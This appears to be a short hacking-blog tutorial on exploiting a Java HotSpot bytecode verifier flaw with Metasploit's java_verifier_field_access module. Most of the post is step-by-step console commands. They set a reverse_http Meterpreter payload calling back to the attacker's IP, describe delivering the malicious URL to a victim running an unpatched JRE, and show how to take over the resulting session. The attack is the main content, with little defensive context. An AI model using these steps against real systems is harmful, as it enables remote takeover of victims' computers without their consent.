![=-=>>W3LC[]M3<<=-=](http://3.bp.blogspot.com/-HQcdYiso0K4/UDjeSQBP6mI/AAAAAAAAAEE/1JtAW52i4iU/s1600/2.jpg)
This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/ PUTFIELD/ GETSTATIC/ PUTSTATIC instructions leads to insufficient type checking. A specially-craft ed class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations.
Requirement:-
*. Attacker Machine: Backtrack
*. Victim Machine: Windows (install JRE un-patched version)
Step1: Launch the Metasploit console
Open the Terminal in the AttackerMachine (Backtrack).
Type " msfupdate " , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.
Step 2:
Type " use exploit/multi/ browser/ java_verifier_fi eld_access " and follow the below commands:-
msf exploit(java_ve rifier_field_ac cess)> set PAYLOAD java/ meterpreter/ reverse_http
msf exploit(java_ve rifier_field_ac cess)> set LHOST [Backtrack IP ADDRESS]
msf exploit(java_ve rifier_field_ac cess)> exploit
Step 3:
If you follow the above commands correctly, you will get the result as in image.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and createsa new session.
Now type " sessions ", this will show the list of active sessions .
Type " sessions -i 1 ", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/ control the Target.
No comments:
Post a Comment